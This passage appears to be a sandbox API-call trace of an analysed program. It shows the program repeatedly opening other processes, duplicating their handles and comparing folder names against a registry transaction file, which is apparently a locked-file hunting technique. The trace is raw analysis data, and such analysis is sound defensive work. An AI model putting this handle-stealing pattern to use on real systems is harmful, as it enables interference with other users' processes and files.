0x62c [0155.192] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.192] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.193] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.193] CloseHandle (hObject=0x670) returned 1 [0155.193] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.193] CloseHandle (hObject=0x680) returned 1 [0155.193] CloseHandle (hObject=0x62c) returned 1 [0155.193] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0155.193] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.194] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.195] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.195] CloseHandle (hObject=0x670) returned 1 [0155.195] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0155.195] CloseHandle (hObject=0x680) returned 1 [0155.195] CloseHandle (hObject=0x62c) returned 1 [0155.195] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0155.195] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.196] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.197] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.198] CloseHandle (hObject=0x670) returned 1 [0155.198] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.198] CloseHandle (hObject=0x680) returned 1 [0155.198] CloseHandle (hObject=0x62c) returned 1 [0155.198] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0155.198] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.198] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.199] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.199] CloseHandle (hObject=0x670) returned 1 [0155.199] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0155.199] CloseHandle (hObject=0x680) returned 1 [0155.199] CloseHandle (hObject=0x62c) returned 1 [0155.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0155.199] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.200] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.201] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.201] CloseHandle (hObject=0x670) returned 1 [0155.201] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.201] CloseHandle (hObject=0x680) returned 1 [0155.201] CloseHandle (hObject=0x62c) returned 1 [0155.201] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0155.201] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.202] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.202] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.202] CloseHandle (hObject=0x670) returned 1 [0155.202] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.202] CloseHandle (hObject=0x680) returned 1 [0155.202] CloseHandle (hObject=0x62c) returned 1 [0155.202] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0155.202] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.204] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.204] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.204] CloseHandle (hObject=0x670) returned 1 [0155.204] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.204] CloseHandle (hObject=0x680) returned 1 [0155.204] CloseHandle (hObject=0x62c) returned 1 [0155.204] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x904) returned 0x62c [0155.204] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.205] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.206] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.206] CloseHandle (hObject=0x670) returned 1 [0155.206] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.206] CloseHandle (hObject=0x680) returned 1 [0155.206] CloseHandle (hObject=0x62c) returned 1 [0155.206] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0155.206] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.207] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.208] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.208] CloseHandle (hObject=0x670) returned 1 [0155.208] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.208] CloseHandle (hObject=0x680) returned 1 [0155.208] CloseHandle (hObject=0x62c) returned 1 [0155.208] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x914) returned 0x62c [0155.208] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.209] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.210] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.211] CloseHandle (hObject=0x670) returned 1 [0155.211] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0155.211] CloseHandle (hObject=0x680) returned 1 [0155.211] CloseHandle (hObject=0x62c) returned 1 [0155.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0155.211] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.211] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.212] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.212] CloseHandle (hObject=0x670) returned 1 [0155.212] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.212] CloseHandle (hObject=0x680) returned 1 [0155.212] CloseHandle (hObject=0x62c) returned 1 [0155.212] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x924) returned 0x62c [0155.212] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.213] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.214] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.214] CloseHandle (hObject=0x670) returned 1 [0155.214] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0155.214] CloseHandle (hObject=0x680) returned 1 [0155.214] CloseHandle (hObject=0x62c) returned 1 [0155.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0155.214] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.215] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.215] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.215] CloseHandle (hObject=0x670) returned 1 [0155.215] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.215] CloseHandle (hObject=0x680) returned 1 [0155.215] CloseHandle (hObject=0x62c) returned 1 [0155.215] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x934) returned 0x62c [0155.215] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.216] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.217] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.217] CloseHandle (hObject=0x670) returned 1 [0155.217] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.217] CloseHandle (hObject=0x680) returned 1 [0155.217] CloseHandle (hObject=0x62c) returned 1 [0155.217] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0155.217] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.218] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.220] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.220] CloseHandle (hObject=0x670) returned 1 [0155.220] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.220] CloseHandle (hObject=0x680) returned 1 [0155.220] CloseHandle (hObject=0x62c) returned 1 [0155.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x944) returned 0x62c [0155.220] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.221] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.222] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.222] CloseHandle (hObject=0x670) returned 1 [0155.222] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.222] CloseHandle (hObject=0x680) returned 1 [0155.222] CloseHandle (hObject=0x62c) returned 1 [0155.222] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0155.222] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.223] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.223] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.223] CloseHandle (hObject=0x670) returned 1 [0155.223] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.223] CloseHandle (hObject=0x680) returned 1 [0155.223] CloseHandle (hObject=0x62c) returned 1 [0155.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0155.224] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.224] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.225] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.225] CloseHandle (hObject=0x670) returned 1 [0155.225] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.225] CloseHandle (hObject=0x680) returned 1 [0155.225] CloseHandle (hObject=0x62c) returned 1 [0155.225] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0155.225] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.232] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.232] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.232] CloseHandle (hObject=0x670) returned 1 [0155.232] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.232] CloseHandle (hObject=0x680) returned 1 [0155.232] CloseHandle (hObject=0x62c) returned 1 [0155.232] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0155.233] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.233] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.234] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.234] CloseHandle (hObject=0x670) returned 1 [0155.234] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.234] CloseHandle (hObject=0x680) returned 1 [0155.234] CloseHandle (hObject=0x62c) returned 1 [0155.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0155.234] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.235] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.236] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.236] CloseHandle (hObject=0x670) returned 1 [0155.236] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.236] CloseHandle (hObject=0x680) returned 1 [0155.236] CloseHandle (hObject=0x62c) returned 1 [0155.236] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0155.236] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.236] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.238] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.238] CloseHandle (hObject=0x670) returned 1 [0155.239] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0155.239] CloseHandle (hObject=0x680) returned 1 [0155.239] CloseHandle (hObject=0x62c) returned 1 [0155.239] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0155.239] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.239] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.240] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.240] CloseHandle (hObject=0x670) returned 1 [0155.240] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.240] CloseHandle (hObject=0x680) returned 1 [0155.240] CloseHandle (hObject=0x62c) returned 1 [0155.240] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0155.240] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.241] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.242] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.242] CloseHandle (hObject=0x670) returned 1 [0155.242] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.242] CloseHandle (hObject=0x680) returned 1 [0155.242] CloseHandle (hObject=0x62c) returned 1 [0155.242] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0155.242] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.243] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.243] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.244] CloseHandle (hObject=0x670) returned 1 [0155.244] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0155.244] CloseHandle (hObject=0x680) returned 1 [0155.244] CloseHandle (hObject=0x62c) returned 1 [0155.244] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0155.244] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, 